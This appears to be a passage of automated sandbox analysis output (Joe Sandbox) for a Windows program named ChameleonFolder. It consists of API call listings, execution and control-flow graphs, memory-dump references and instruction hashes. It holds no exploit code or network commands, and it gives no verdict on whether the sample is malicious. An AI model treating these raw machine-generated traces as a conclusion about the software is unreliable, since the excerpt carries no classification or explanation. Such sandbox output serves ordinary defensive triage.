                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 029D9DA4
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 029D9DD7
                                                                                                              • Part of subcall function 029D9C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,029D9D55), ref: 029D9CAB
                                                                                                              • Part of subcall function 029D9C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,029D9D55), ref: 029D9CC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.2007723960.00000000029D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029D1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_17_2_29d1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 4d2f014ad7cf0c8997ec82b3094aea3cecb3c24bbd03c416cf85e182accd26a6
                                                                                                            • Instruction ID: d96b3224f98894ada9a3e0723ddc30794effc5b3357251e63a67c2d29baf317c
                                                                                                            • Opcode Fuzzy Hash: 4d2f014ad7cf0c8997ec82b3094aea3cecb3c24bbd03c416cf85e182accd26a6
                                                                                                            • Instruction Fuzzy Hash: 92314F70E0021A9BEB10EFE8C880BAEB3F9FF48315F408575E515E7254EB749A05DB90

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:30
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 27195 29aaf3c 27197 29aaf44 27195->27197 27196 29aaf80 27197->27196 27199 29a95fc 27197->27199 27200 29a9621 27199->27200 27201 29a960b 27199->27201 27200->27196 27201->27200 27203 29a95b4 27201->27203 27204 29a95e0 27203->27204 27205 29a95c4 27203->27205 27204->27200 27207 29aa82c 27205->27207 27208 29aa86d 27207->27208 27211 29aa708 27208->27211 27210 29aa8a6 27210->27204 27213 29aa729 27211->27213 27212 29aa7a4 27212->27210 27213->27212 27217 29a9df4 27213->27217 27215 29aa7c0 27215->27212 27216 29a9df4 6 API calls 27215->27216 27216->27212 27218 29a9e17 27217->27218 27220 29a9e20 27218->27220 27221 29a9cd8 6 API calls 27218->27221 27220->27215 27221->27220 27222 2a3988c 27223 2a398b2 27222->27223 27225 2a3989a 27222->27225 27224 2a398bd PostMessageW 27223->27224 27223->27225 27224->27225 27226 2a39b9c 27227 2a39bac 27226->27227 27231 2a39bd8 27226->27231 27228 2a39bb2 CreateFileMappingW 27227->27228 27227->27231 27229 2a39be6 MapViewOfFile 27228->27229 27228->27231 27229->27231

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 30 2a39b9c-2a39ba6 31 2a39c3f-2a39c47 30->31 32 2a39bac 30->32 33 2a39c56-2a39c5e 31->33 34 2a39c49-2a39c50 31->34 35 2a39c72-2a39c74 32->35 36 2a39bb2-2a39bd6 CreateFileMappingW 32->36 37 2a39c60-2a39c67 33->37 38 2a39c6d call 2a37348 33->38 34->33 39 2a39be6-2a39c15 MapViewOfFile 36->39 40 2a39bd8-2a39be1 36->40 37->38 38->35 43 2a39c17-2a39c31 39->43 44 2a39c38 call 2a37328 39->44 40->35 43->44 47 2a39c3d 44->47 47->35
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}), ref: 02A39BC1
                                                                                                            • MapViewOfFile.KERNELBASE(02A4350C,00000006,00000000,00000000,00000028,?), ref: 02A39C04
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 02A39BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2074011261.00000000029B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029B1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_29b1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 3452162329-4124573863
                                                                                                            • Opcode ID: 30c58e8c27157e4325dc79f683963cb9007e61e51b8aa6b64544e8d885b07cb7
                                                                                                            • Instruction ID: 568c125ceafad96336ab79bd36c8c23d3d041e33349f79ec83b10511852fcdab
                                                                                                            • Opcode Fuzzy Hash: 30c58e8c27157e4325dc79f683963cb9007e61e51b8aa6b64544e8d885b07cb7
                                                                                                            • Instruction Fuzzy Hash: 87212778A84302EFDB12EBA8D885B0677F5AB8A710F208595F5149F290CFB1E8518F51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 107 2a3988c-2a39898 108 2a398b2-2a398bb 107->108 109 2a3989a-2a398b0 107->109 110 2a398bd-2a398d7 PostMessageW 108->110 111 2a398dc-2a398f8 108->111 113 2a398fb-2a39900 109->113 110->111 111->113
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(02720000,02A4940C,?,?), ref: 02A398D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2074011261.00000000029B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029B1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_29b1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: d9369144f8689d4fb021da509cc1329bf85f07c470ea243190f68d31ff319eb3
                                                                                                            • Instruction ID: 3deecf6bd036ea54bbfd85969bd36dba6efb8955751c8ad3e5c96eff44207b45
                                                                                                            • Opcode Fuzzy Hash: d9369144f8689d4fb021da509cc1329bf85f07c470ea243190f68d31ff319eb3
                                                                                                            • Instruction Fuzzy Hash: B71160BAA40209EFCB40DF9CD880E9A77F8AB8D350B108545FA19DB350C771EA519FA4
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 029A9CE9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 029A9D47
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 029A9DA4
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 029A9DD7
                                                                                                              • Part of subcall function 029A9C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,029A9D55), ref: 029A9CAB
                                                                                                              • Part of subcall function 029A9C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,029A9D55), ref: 029A9CC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2074011261.00000000029A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029A1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_29a1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 817ef2e1cb56d48325d92021e9e90e92c3c550fb85163090115a87eb1097369e
                                                                                                            • Instruction ID: 9d827d9105458471c2584f7e5bd089f80669eb657c44d83701461c2b5154f51a
                                                                                                            • Opcode Fuzzy Hash: 817ef2e1cb56d48325d92021e9e90e92c3c550fb85163090115a87eb1097369e
                                                                                                            • Instruction Fuzzy Hash: 27314B70E0021A9BEB10EFE8C890AAEB3F9FF48314F404565E515E7285EB74AA45CB90

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:30
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 27534 2a7af3c 27535 2a7af44 27534->27535 27535->27535 27537 2a7af80 27535->27537 27538 2a795fc 27535->27538 27539 2a79621 27538->27539 27540 2a7960b 27538->27540 27539->27537 27540->27539 27542 2a795b4 27540->27542 27543 2a795c4 27542->27543 27544 2a795e0 27542->27544 27546 2a7a82c 27543->27546 27544->27539 27547 2a7a86d 27546->27547 27550 2a7a708 27547->27550 27549 2a7a8a6 27549->27544 27552 2a7a729 27550->27552 27551 2a7a7a4 27551->27549 27552->27551 27556 2a79df4 27552->27556 27554 2a7a7c0 27554->27551 27555 2a79df4 6 API calls 27554->27555 27555->27551 27557 2a79e17 27556->27557 27559 2a79e20 27557->27559 27560 2a79cd8 6 API calls 27557->27560 27559->27554 27560->27559 27561 2b09b9c 27562 2b09bac 27561->27562 27563 2b09bd8 27561->27563 27562->27563 27564 2b09bb2 CreateFileMappingW 27562->27564 27564->27563 27565 2b09be6 MapViewOfFile 27564->27565 27565->27563 27567 2b0988c 27568 2b098b2 27567->27568 27569 2b0989a 27567->27569 27568->27569 27570 2b098bd PostMessageW 27568->27570 27570->27569

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 30 2b09b9c-2b09ba6 31 2b09bac 30->31 32 2b09c3f-2b09c47 30->32 35 2b09c72-2b09c74 31->35 36 2b09bb2-2b09bd6 CreateFileMappingW 31->36 33 2b09c56-2b09c5e 32->33 34 2b09c49-2b09c50 32->34 37 2b09c60-2b09c67 33->37 38 2b09c6d call 2b07348 33->38 34->33 39 2b09be6-2b09c15 MapViewOfFile 36->39 40 2b09bd8-2b09be1 36->40 37->38 38->35 43 2b09c17-2b09c31 39->43 44 2b09c38 call 2b07328 39->44 40->35 43->44 47 2b09c3d 44->47 47->35
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}), ref: 02B09BC1
                                                                                                            • MapViewOfFile.KERNELBASE(02B1350C,00000006,00000000,00000000,00000028,?), ref: 02B09C04
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 02B09BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2063430433.0000000002A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A81000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_2a81000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 3452162329-4124573863
                                                                                                            • Opcode ID: 6fb19c085978afc528201bf83726e73f8209d08d6f894e3b943fb8f6d230b587
                                                                                                            • Instruction ID: b726ce71258cdb374e048b33ca705f2d3c130d6ac1be3fdbe790fa7db2b1bda9
                                                                                                            • Opcode Fuzzy Hash: 6fb19c085978afc528201bf83726e73f8209d08d6f894e3b943fb8f6d230b587
                                                                                                            • Instruction Fuzzy Hash: 7E214D34AC4600EFD721DBA8D985B05BBE6EB09B60F9085D5E511DB3D1DB70A890CF14

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 107 2b0988c-2b09898 108 2b098b2-2b098bb 107->108 109 2b0989a-2b098b0 107->109 110 2b098dc-2b098f8 108->110 111 2b098bd-2b098d7 PostMessageW 108->111 113 2b098fb-2b09900 109->113 110->113 111->110
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(00B70000,02B1940C,?,?), ref: 02B098D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2063430433.0000000002A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A81000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_2a81000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 3fed0571b5503e34907b5ae2571506aece38ce61b871637ec76875678c9cdc09
                                                                                                            • Instruction ID: a2b2de13cd64fe8f59b4a45e20642ebc9dc2800b55baebd64d1834fa704b948b
                                                                                                            • Opcode Fuzzy Hash: 3fed0571b5503e34907b5ae2571506aece38ce61b871637ec76875678c9cdc09
                                                                                                            • Instruction Fuzzy Hash: 99116375A40608EFCB40DF9CD980E9A77E9EB0D7A0B408585F918DB351D730E9509F64
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 02A79CE9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 02A79D47
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 02A79DA4
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 02A79DD7
                                                                                                              • Part of subcall function 02A79C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,02A79D55), ref: 02A79CAB
                                                                                                              • Part of subcall function 02A79C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,02A79D55), ref: 02A79CC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2063430433.0000000002A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A71000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_2a71000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 18fbbc10937fc36df1a6918d6876764677fbb3f2c27403f941bff0428a83736f
                                                                                                            • Instruction ID: f253d57d62ff436229c32683b43771eb8676b1eb8eccf62a0f965b661ed258b7
                                                                                                            • Opcode Fuzzy Hash: 18fbbc10937fc36df1a6918d6876764677fbb3f2c27403f941bff0428a83736f
                                                                                                            • Instruction Fuzzy Hash: 69315C70E0022A9BDF10EFE8CC80AAFB3B9FF08315F504566D515E7285EB74AA04CB94

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:6.8%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:625
                                                                                                            Total number of Limit Nodes:12
                                                                                                            execution_graph 7776 332af00 7777 332afca 7776->7777 7778 332af3c 7776->7778 7779 332b890 21 API calls 7777->7779 7778->7777 7790 332bec0 27 API calls 7778->7790 7791 332aee0 7778->7791 7794 332ade0 7778->7794 7801 332bfd0 7778->7801 7807 332ae60 7778->7807 7814 332bf80 7778->7814 7780 332afd5 7779->7780 7824 332b930 7780->7824 7790->7778 7831 33312e0 7791->7831 7795 33312e0 61 API calls 7794->7795 7796 332ae06 7795->7796 8118 332c740 7796->8118 7799 332b890 21 API calls 7800 332ae20 7799->7800 7800->7778 7802 332bfeb 7801->7802 7803 332c002 7801->7803 7802->7803 7805 332b7b0 27 API calls 7802->7805 7804 332b8e0 21 API calls 7803->7804 7806 332c03f 7804->7806 7805->7803 7806->7778 7808 33312e0 61 API calls 7807->7808 7809 332ae86 7808->7809 8149 332cd80 7809->8149 7812 332b890 21 API calls 7813 332ae9d 7812->7813 7813->7778 7815 332bf96 7814->7815 7816 332bf8c 7814->7816 7815->7778 7817 332bf91 7816->7817 7818 332bf98 7816->7818 7819 332b930 SysFreeString 7817->7819 7820 332bfb2 7818->7820 7821 332bfab 7818->7821 7819->7815 7820->7815 7823 332b830 21 API calls 7820->7823 7822 332b930 SysFreeString 7821->7822 7822->7815 7823->7815 7825 332b942 SysFreeString 7824->7825 7826 332afde 7824->7826 7825->7826 7827 332b8e0 7826->7827 7828 332afe7 7827->7828 7829 332b8ee 7827->7829 7829->7828 7830 3326a60 21 API calls 7829->7830 7830->7828 7832 333130d 7831->7832 7839 332aef0 7831->7839 7833 3331317 7832->7833 7834 3331349 7832->7834 7840 332eed0 7833->7840 7850 332cca0 7834->7850 7837 3331322 7844 332bb50 7837->7844 7839->7778 7841 332eefa 7840->7841 7842 332eee0 7840->7842 7841->7837 7842->7841 7854 332ee70 7842->7854 7845 332bb6f 7844->7845 7849 332bb76 7844->7849 7846 332b750 27 API calls 7845->7846 7846->7849 7847 332b890 21 API calls 7848 332bba4 7847->7848 7848->7839 7849->7847 7851 332ccb4 7850->7851 7852 332bb50 27 API calls 7851->7852 7853 332ccc2 7852->7853 7853->7839 7855 332ee86 7854->7855 7856 332eea5 7854->7856 7858 33307f0 GetModuleFileNameW 7855->7858 7856->7841 7869 332ccd0 7858->7869 7861 332cca0 27 API calls 7862 3330853 7861->7862 7873 33305a0 7862->7873 7864 332b970 21 API calls 7865 333089a 7864->7865 7867 332b890 21 API calls 7865->7867 7866 3330864 7866->7864 7868 33308a3 7867->7868 7868->7856 7870 332ccdf 7869->7870 7871 332bb50 27 API calls 7870->7871 7872 332cd11 7871->7872 7872->7861 7874 3330606 7873->7874 7875 332b890 21 API calls 7874->7875 7876 333061c 7875->7876 7877 33306c4 7876->7877 7909 332bf40 7876->7909 7879 332b970 21 API calls 7877->7879 7880 3330775 7879->7880 7881 332b970 21 API calls 7880->7881 7882 3330787 7881->7882 7882->7866 7883 3330682 7913 3330170 7883->7913 7888 33306a3 7890 3330320 29 API calls 7888->7890 7889 33306c9 7923 332f8c0 7889->7923 7891 33306b7 7890->7891 7892 332bec0 27 API calls 7891->7892 7892->7877 7897 332bec0 27 API calls 7898 33306fa 7897->7898 7899 333073e 7898->7899 7900 333070d GetSystemDefaultUILanguage 7898->7900 7899->7877 7966 3330460 7899->7966 7901 332f8c0 40 API calls 7900->7901 7903 333071d 7901->7903 7905 3330320 29 API calls 7903->7905 7907 3330731 7905->7907 7906 332bec0 27 API calls 7906->7877 7908 332bec0 27 API calls 7907->7908 7908->7899 7910 332bf55 7909->7910 7911 332b890 21 API calls 7910->7911 7912 332bf70 7911->7912 7912->7883 7987 332d240 7912->7987 7914 3330193 7913->7914 7915 33301a9 7913->7915 7991 332fd10 7914->7991 7917 332cca0 27 API calls 7915->7917 7919 33301b9 7917->7919 7921 332b890 21 API calls 7919->7921 7922 33301c3 7921->7922 7922->7888 7922->7889 7924 332f8f5 7923->7924 7925 332f903 7924->7925 7926 332f92b 7924->7926 7927 332ccd0 27 API calls 7925->7927 7930 332b890 21 API calls 7926->7930 7928 332f91a LeaveCriticalSection 7927->7928 7929 332fa36 7928->7929 7931 332b970 21 API calls 7929->7931 7934 332f940 7930->7934 7932 332fa45 7931->7932 7952 3330320 7932->7952 7933 332f9f0 EnterCriticalSection 7937 332fa14 7933->7937 7934->7933 7935 332f984 7934->7935 7936 332f964 7934->7936 8051 332f480 7935->8051 8030 332f750 GetThreadUILanguage 7936->8030 7944 332fa29 LeaveCriticalSection 7937->7944 7942 332bec0 27 API calls 7946 332f9a2 7942->7946 7943 332bec0 27 API calls 7945 332f982 7943->7945 7944->7929 7945->7933 7946->7933 7947 332f9cf GetSystemDefaultUILanguage 7946->7947 7948 332cf40 27 API calls 7946->7948 7949 332f480 30 API calls 7947->7949 7948->7947 7950 332f9e3 7949->7950 7951 332cf40 27 API calls 7950->7951 7951->7933 7953 333034b 7952->7953 7954 332b890 21 API calls 7953->7954 7955 333035e 7954->7955 7956 33303d8 7955->7956 7958 33303e1 7955->7958 7961 332d240 27 API calls 7955->7961 7964 332d030 27 API calls 7955->7964 8109 3330280 7955->8109 7957 332b890 21 API calls 7956->7957 7957->7958 7959 332b890 21 API calls 7958->7959 7960 33303eb 7959->7960 7962 332b970 21 API calls 7960->7962 7961->7955 7963 33303fa 7962->7963 7963->7897 7964->7955 8116 332ba20 7966->8116 7969 332ccd0 27 API calls 7970 33304c0 7969->7970 7971 332d030 27 API calls 7970->7971 7972 33304d1 7971->7972 7973 3330280 23 API calls 7972->7973 7974 33304e1 7973->7974 7976 332ccd0 27 API calls 7974->7976 7986 333052d 7974->7986 7975 332b970 21 API calls 7977 333053d 7975->7977 7978 33304ff 7976->7978 7979 332b890 21 API calls 7977->7979 7980 332d030 27 API calls 7978->7980 7981 3330546 7979->7981 7982 3330510 7980->7982 7981->7906 7983 3330280 23 API calls 7982->7983 7984 3330520 7983->7984 7985 332b890 21 API calls 7984->7985 7984->7986 7985->7986 7986->7975 7988 332d253 7987->7988 7989 332bb50 27 API calls 7988->7989 7990 332d294 7989->7990 7990->7883 7992 332fd39 7991->7992 7993 332fd44 GetModuleFileNameW 7992->7993 7994 332fd59 7992->7994 7993->7994 7995 332fd82 RegOpenKeyExW 7994->7995 7996 332ffdb 7994->7996 7997 332fea5 7995->7997 7998 332fdbd RegOpenKeyExW 7995->7998 7999 332b890 21 API calls 7996->7999 8025 332fac0 GetModuleHandleW 7997->8025 7998->7997 8000 332fded RegOpenKeyExW 7998->8000 8002 332ffe8 7999->8002 8000->7997 8003 332fe1d RegOpenKeyExW 8000->8003 8019 3330200 8002->8019 8003->7997 8005 332fe49 RegOpenKeyExW 8003->8005 8004 332feb9 RegQueryValueExW 8006 332fee5 8004->8006 8007 332ff38 RegQueryValueExW 8004->8007 8005->7997 8010 332fe75 RegOpenKeyExW 8005->8010 8011 3326a30 27 API calls 8006->8011 8008 332ff67 8007->8008 8009 332ff33 8007->8009 8012 3326a30 27 API calls 8008->8012 8013 332ffcf RegCloseKey 8009->8013 8016 3326a60 21 API calls 8009->8016 8010->7996 8010->7997 8014 332feee RegQueryValueExW 8011->8014 8015 332ff70 RegQueryValueExW 8012->8015 8013->7996 8017 332cca0 27 API calls 8014->8017 8018 332cca0 27 API calls 8015->8018 8016->8013 8017->8009 8018->8009 8020 3330213 8019->8020 8022 333021f 8019->8022 8021 3326a60 21 API calls 8020->8021 8021->8022 8023 3326a30 27 API calls 8022->8023 8024 333023d 8022->8024 8023->8024 8024->7915 8026 332faf5 GetProcAddress 8025->8026 8028 332fb0f 8025->8028 8026->8028 8027 332fb24 8027->8004 8028->8027 8029 332fc9d lstrlenW 8028->8029 8029->8028 8031 332f7e6 8030->8031 8032 332f774 8030->8032 8033 332f6f0 29 API calls 8031->8033 8068 332f6f0 GetThreadPreferredUILanguages 8032->8068 8041 332f7f2 8033->8041 8036 332f840 8038 332f8a5 8036->8038 8039 332f845 SetThreadPreferredUILanguages 8036->8039 8038->7943 8040 332f6f0 29 API calls 8039->8040 8046 332f861 8040->8046 8041->8036 8042 332cca0 27 API calls 8041->8042 8043 332f838 8042->8043 8045 3326a60 21 API calls 8043->8045 8044 332f882 SetThreadPreferredUILanguages 8047 332f895 8044->8047 8045->8036 8046->8044 8046->8047 8048 3326a60 21 API calls 8047->8048 8049 332f89d 8048->8049 8050 3326a60 21 API calls 8049->8050 8050->8038 8052 332b890 21 API calls 8051->8052 8059 332f4ba 8052->8059 8053 332f560 8054 332f576 IsValidLocale 8053->8054 8055 332f64a 8053->8055 8054->8055 8056 332f591 GetLocaleInfoW GetLocaleInfoW 8054->8056 8057 332b970 21 API calls 8055->8057 8058 332ccd0 27 API calls 8056->8058 8060 332f65a 8057->8060 8061 332f5e7 8058->8061 8059->8053 8073 332f310 8059->8073 8060->7942 8062 332ccd0 27 API calls 8061->8062 8064 332f5fb 8062->8064 8065 332ccd0 27 API calls 8064->8065 8066 332f612 8065->8066 8087 332d150 8066->8087 8069 332f720 8068->8069 8070 332f745 SetThreadPreferredUILanguages 8068->8070 8071 3326a30 27 API calls 8069->8071 8070->8031 8072 332f72c GetThreadPreferredUILanguages 8071->8072 8072->8070 8090 332cc70 8073->8090 8076 332bf40 21 API calls 8077 332f3a1 8076->8077 8080 332b890 21 API calls 8077->8080 8078 332f417 8079 332b970 21 API calls 8078->8079 8081 332f427 8079->8081 8084 332f3aa 8080->8084 8081->8053 8082 332d150 27 API calls 8082->8084 8084->8078 8084->8082 8085 332d240 27 API calls 8084->8085 8086 332bf40 21 API calls 8084->8086 8094 332f270 8084->8094 8085->8084 8086->8084 8098 332c8b0 8087->8098 8091 332cc84 8090->8091 8092 332bd20 27 API calls 8091->8092 8093 332cc92 8092->8093 8093->8076 8093->8078 8095 332f285 8094->8095 8096 332b890 21 API calls 8095->8096 8097 332f2cb 8096->8097 8097->8084 8099 332c919 8098->8099 8105 332c8dd 8098->8105 8100 332c924 8099->8100 8101 332c94c 8099->8101 8102 332ce60 27 API calls 8100->8102 8103 332b750 27 API calls 8101->8103 8104 332c93c 8102->8104 8103->8104 8107 332c9bf 8104->8107 8108 332b890 21 API calls 8104->8108 8105->8099 8106 3328240 21 API calls 8105->8106 8106->8105 8107->8055 8108->8107 8110 333029e 8109->8110 8111 33302ab FindFirstFileW 8110->8111 8112 33302d2 8111->8112 8113 33302ca FindClose 8111->8113 8114 332b890 21 API calls 8112->8114 8113->8112 8115 33302df 8114->8115 8115->7955 8117 332ba28 GetUserDefaultUILanguage GetLocaleInfoW 8116->8117 8117->7969 8119 332c750 8118->8119 8120 332c749 8118->8120 8124 332be10 8119->8124 8121 332b8e0 21 API calls 8120->8121 8123 332ae16 8121->8123 8123->7799 8125 332be2b 8124->8125 8127 332be37 8124->8127 8126 332b8e0 21 API calls 8125->8126 8130 332be35 8126->8130 8132 332c670 8127->8132 8129 332be6f 8129->8130 8131 332b8e0 21 API calls 8129->8131 8130->8123 8131->8130 8133 332c693 8132->8133 8134 332c686 8132->8134 8136 332c6e1 8133->8136 8137 332c6a2 8133->8137 8135 332b8e0 21 API calls 8134->8135 8140 332c68e 8135->8140 8143 332b7b0 8136->8143 8139 3326a90 21 API calls 8137->8139 8139->8140 8140->8129 8141 332c6eb 8141->8140 8142 332b8e0 21 API calls 8141->8142 8142->8140 8144 332b7c1 8143->8144 8148 332b7e5 8143->8148 8145 332b7ce 8144->8145 8146 3328240 21 API calls 8144->8146 8147 3326a30 27 API calls 8145->8147 8146->8145 8147->8148 8148->8141 8150 332cd90 8149->8150 8151 332cd89 8149->8151 8155 332bbb0 8150->8155 8152 332b930 SysFreeString 8151->8152 8154 332ae93 8152->8154 8154->7812 8156 332bbbe 8155->8156 8160 332bbc8 8155->8160 8157 332b930 SysFreeString 8156->8157 8158 332bbc6 8157->8158 8158->8154 8159 332bbe0 8159->8158 8162 332bbe6 SysFreeString 8159->8162 8160->8159 8163 332b830 8160->8163 8162->8158 8164 3326d00 21 API calls 8163->8164 8165 332b84e 8164->8165 8165->8159 7423 3413af0 7424 3413b19 7423->7424 7425 3413b71 7424->7425 7431 3331830 7424->7431 7429 3413b62 7441 332b3c0 7429->7441 7432 333184b 7431->7432 7454 332ac80 7432->7454 7435 34082b0 7436 340839b 7435->7436 7439 34082ca 7435->7439 7437 3408313 7436->7437 7438 34083c4 CloseHandle 7436->7438 7437->7429 7438->7437 7439->7437 7475 3404f70 7439->7475 7442 332b3d1 7441->7442 7443 332b3e6 7441->7443 7679 332b2e0 7442->7679 7444 332b3f0 GetCurrentThreadId 7443->7444 7447 332b3fd 7443->7447 7444->7447 7446 332b3db 7446->7443 7449 3326c90 18 API calls 7447->7449 7450 332b524 7447->7450 7453 332b4db FreeLibrary 7447->7453 7675 332ab30 7447->7675 7449->7447 7451 332b534 ExitProcess 7450->7451 7452 332b52e 7450->7452 7452->7451 7453->7447 7455 332aca6 7454->7455 7456 332acad GetCurrentThreadId 7454->7456 7455->7456 7457 332acfc 7456->7457 7458 332adc0 7457->7458 7459 332adb9 7457->7459 7461 332b3c0 21 API calls 7458->7461 7463 332abd0 7459->7463 7462 332adbe 7461->7462 7462->7435 7464 332ac4d 7463->7464 7465 332abe6 7463->7465 7464->7462 7465->7464 7467 33314c0 7465->7467 7468 3331591 7467->7468 7469 33314d8 7467->7469 7468->7465 7470 333151c 7469->7470 7471 3331571 GetCurrentThreadId 7470->7471 7473 33313f0 GetVersion 7471->7473 7474 333140f 7473->7474 7474->7468 7476 3404f96 7475->7476 7477 3404f80 7475->7477 7476->7437 7477->7476 7479 3404900 7477->7479 7480 3404941 7479->7480 7500 3404b6a 7479->7500 7501 3341190 7480->7501 7488 3404969 7489 3404a98 RegisterWindowMessageW 7488->7489 7490 33337a0 7489->7490 7491 3404abb RegisterWindowMessageW 7490->7491 7492 33337a0 7491->7492 7493 3404ade RegisterWindowMessageW 7492->7493 7494 33337a0 7493->7494 7495 3404b01 RegisterWindowMessageW 7494->7495 7496 33337a0 7495->7496 7497 3404b24 RegisterWindowMessageW 7496->7497 7498 33337a0 7497->7498 7499 3404b47 RegisterWindowMessageW 7498->7499 7499->7500 7528 332b970 7500->7528 7502 33411ad 7501->7502 7503 334119d 7501->7503 7505 3340e40 27 API calls 7502->7505 7536 3340e40 7503->7536 7506 33411ab 7505->7506 7507 332d030 7506->7507 7508 332d04b 7507->7508 7509 332d05d 7507->7509 7641 332bec0 7508->7641 7511 332d062 7509->7511 7512 332d074 7509->7512 7513 332bec0 27 API calls 7511->7513 7514 332d090 7512->7514 7515 332d07e 7512->7515 7519 332d058 7513->7519 7517 332d127 7514->7517 7518 332d09e 7514->7518 7647 332cf40 7515->7647 7520 332bec0 27 API calls 7517->7520 7521 332d0cd 7518->7521 7523 3328240 21 API calls 7518->7523 7519->7488 7522 332d134 7520->7522 7524 332b750 27 API calls 7521->7524 7525 332cf40 27 API calls 7522->7525 7523->7521 7526 332d0d4 7524->7526 7525->7519 7527 332b890 21 API calls 